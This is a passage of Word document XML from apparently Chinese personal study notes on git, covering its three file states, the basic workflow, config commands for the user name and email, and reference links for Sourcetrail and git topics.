          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>ourcetrail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB722EA" w14:textId="7ED6FC6A" w:rsidR="00AD75F7" w:rsidRDefault="00AD75F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD75F7">
        <w:t>https://github.com/CoatiSoftware/Sourcetrail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A3974" w14:textId="0064C89E" w:rsidR="00AD75F7" w:rsidRPr="00AD75F7" w:rsidRDefault="00AD75F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD75F7">
        <w:t>https://www.sourcetrail.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C7720C" w14:textId="61531771" w:rsidR="005B411A" w:rsidRDefault="003D43A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003D43A0">
        <w:t>https://zhuanlan.zhihu.com/p/96685579</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486F10B9" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E1654B" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF7D127" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A1F9604" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CAF0EC" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C893C90" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E54E4E" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F9F90D" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD44516" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6B1CE8" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2440C7CD" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643DBCF1" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F864F9B" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4A5E77" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F07745" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281C804A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc159779490"/>
      <w:r>
        <w:t>git</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="687251C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc159779491"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作区、暂存区、仓库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="04B8104B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc159779492"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="2455CE49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t>有三种状态：已提交（</w:t>
      </w:r>
      <w:r>
        <w:t>committed</w:t>
      </w:r>
      <w:r>
        <w:t>）、已修改（</w:t>
      </w:r>
      <w:r>
        <w:t>modified</w:t>
      </w:r>
      <w:r>
        <w:t>）和已暂存（</w:t>
      </w:r>
      <w:r>
        <w:t>staged</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD79379" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B415157" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>已提交</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DA3BEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>数据已经安全的保存在本地数据库中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46395A85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>已修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21528A58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>修改了文件，但是还没保存到数据库中，发生在工作区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76920644" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>已暂存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0756A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>对修改的文件的当前版本做了标记，让他包含在下次提交的快照当中。发生在暂存区，英文叫</w:t>
      </w:r>
      <w:r>
        <w:t>stage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43948A41" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3488B8EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc159779493"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="7C2B49B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:t>https://zhuanlan.zhihu.com/p/96631135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B7E7B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61414998" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B13E90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB9D4D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5626C3E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28362433" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc159779494"/>
      <w:r>
        <w:t>基本的</w:t>
      </w:r>
      <w:r>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t>工作流程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="4017839B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在工作区敲代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6120AB4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>将需要保存的文件放进暂存区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D586238" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>提交更新，将暂存区存储到本地</w:t>
      </w:r>
      <w:r>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t>仓库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BCCF7F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>将本地的提交到远程仓库（根据需求选择）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2070E3C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DE0177" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc159779495"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除某个中间的提交记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="50EAEC00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6C9790" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://juejin.cn/post/6981769872338321416</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FF47CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5372712B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686C5576" w14:textId="3D460F95" w:rsidR="004C452C" w:rsidRDefault="008844F1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc159779496"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改登录用户名或邮箱</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="1F177DB7" w14:textId="0134A9F2" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C68532C" w14:textId="18B10EA6" w:rsidR="008844F1" w:rsidRDefault="00D864FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D864FF">
        <w:t>https://blog.csdn.net/qq_44695727/article/details/104273576</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3275FE05" w14:textId="6011EE57" w:rsidR="008844F1" w:rsidRDefault="008844F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C4E17B" w14:textId="77777777" w:rsidR="00EB4EB0" w:rsidRDefault="00EB4EB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB4EB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>查看远程仓库地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF16356" w14:textId="640B260A" w:rsidR="001D1CB1" w:rsidRDefault="00EB4EB0" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git remote -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB98AF4" w14:textId="77777777" w:rsidR="001D1CB1" w:rsidRPr="00D864FF" w:rsidRDefault="001D1CB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8906FA" w14:textId="6C60FE8A" w:rsidR="001D1CB1" w:rsidRDefault="001D1CB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB4EB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>查看用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD7A63" w14:textId="26504201" w:rsidR="001D1CB1" w:rsidRDefault="001D1CB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  git config user.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7000DE67" w14:textId="77777777" w:rsidR="001D1CB1" w:rsidRDefault="001D1CB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA930CC" w14:textId="266C5D9E" w:rsidR="001D1CB1" w:rsidRDefault="001D1CB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB4EB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>查看用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C1E157" w14:textId="1BE07AA4" w:rsidR="001D1CB1" w:rsidRDefault="001D1CB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  git config user.email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCDACD7" w14:textId="77777777" w:rsidR="001D1CB1" w:rsidRDefault="001D1CB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22876DF2" w14:textId="2FC10B6F" w:rsidR="001D1CB1" w:rsidRDefault="001D1CB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB4EB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>修改用户名和邮箱的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBD93E" w14:textId="4091ADB0" w:rsidR="008844F1" w:rsidRDefault="001D1CB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  git config --global user.name "userName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1639D4FB" w14:textId="77777777" w:rsidR="008844F1" w:rsidRDefault="008844F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C2164D" w14:textId="6EDE6CD3" w:rsidR="008844F1" w:rsidRDefault="008844F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6601C739" w14:textId="3C8B8AB5" w:rsidR="008844F1" w:rsidRDefault="00D6221A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc159779497"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置代理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="6B3E9154" w14:textId="6F3F8E91" w:rsidR="00D6221A" w:rsidRPr="00D6221A" w:rsidRDefault="00E54C86" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="744D3620" wp14:editId="42D19E4E">
            <wp:extent cx="5274310" cy="4943475"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="68940291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02914" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4943475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00349258" w14:textId="77777777" w:rsidR="008844F1" w:rsidRDefault="008844F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633E93E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72BC9DCB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48FE5A46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc159779498"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="60DA0E10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285A6577" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://git-scm.com/docs/git-log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF33E0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A05EED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57667AA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117BEFE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AAF09DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081A7626" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3343E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BBFF1CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DABD7AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347E0D5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc159779499"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建项目仓库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="62D3C336" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc159779500"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="70F4D651" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCECA3F" w14:textId="5A700282" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
